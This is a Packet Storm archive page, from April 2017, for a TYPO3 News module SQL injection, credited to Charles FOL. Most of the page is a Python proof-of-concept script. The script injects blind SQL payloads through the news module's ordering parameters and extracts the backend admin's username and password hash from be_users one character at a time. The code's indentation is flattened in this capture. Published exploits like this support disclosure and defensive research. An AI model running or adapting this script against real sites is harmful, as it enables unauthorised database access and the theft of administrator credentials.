Exploit the possiblities

TYPO3 News Module SQL Injection

TYPO3 News Module SQL Injection
Posted Apr 27, 2017
Authored by Charles FOL

The TYPO3 News module suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | c228a9bf723e2701aa1a67c101072d81

TYPO3 News Module SQL Injection

Change Mirror Download
# Exploit Title: TYPO3 News Module SQL Injection
# Vendor Homepage: https://typo3.org/extensions/repository/view/news
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/typo3-news-module-sqli


#!/usr/bin/python3

# TYPO3 News Module SQL Injection Exploit
# https://www.ambionics.io/blog/typo3-news-module-sqli
# cf
#
# The injection algorithm is not optimized, this is just meant to be a POC.
#

import requests
import string


session = requests.Session()
session.proxies = {'http': 'localhost:8080'}


# Change this
URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
PATTERN0 = 'Article #1'
PATTERN1 = 'Article #2'

FULL_CHARSET = string.ascii_letters + string.digits + '$./'


def blind(field, table, condition, charset):

# We add 9 so that the result has two digits

# If the length is superior to 100-9 it won't work

size = blind_size(

'length(%s)+9' % field, table, condition,

2, string.digits

)

size = int(size) - 9

data = blind_size(

field, table, condition,

size, charset

)

return data


def select_position(field, table, condition, position, char):

payload = 'select(%s)from(%s)where(%s)' % (

field, table, condition

)

payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position)

payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % (

payload, ord(char)

)

return payload


def blind_size(field, table, condition, size, charset):

string = ''

for position in range(size):

for char in charset:

payload = select_position(field, table, condition, position+1, char)

if test(payload):

string += char

print(string)

break

else:

raise ValueError('Char was not found')



return string


def test(payload):

response = session.post(

URL,

data=data(payload)

)

response = response.text

return response.index(PATTERN0) < response.index(PATTERN1)

def data(payload):

return {

'tx_news_pi1[overwriteDemand][order]': payload,

'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload,

'tx_news_pi1[search][subject]': '',

'tx_news_pi1[search][minimumDate]': '2016-01-01',

'tx_news_pi1[search][maximumDate]': '2016-12-31',

}

# Exploit

print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters))
print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    12 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close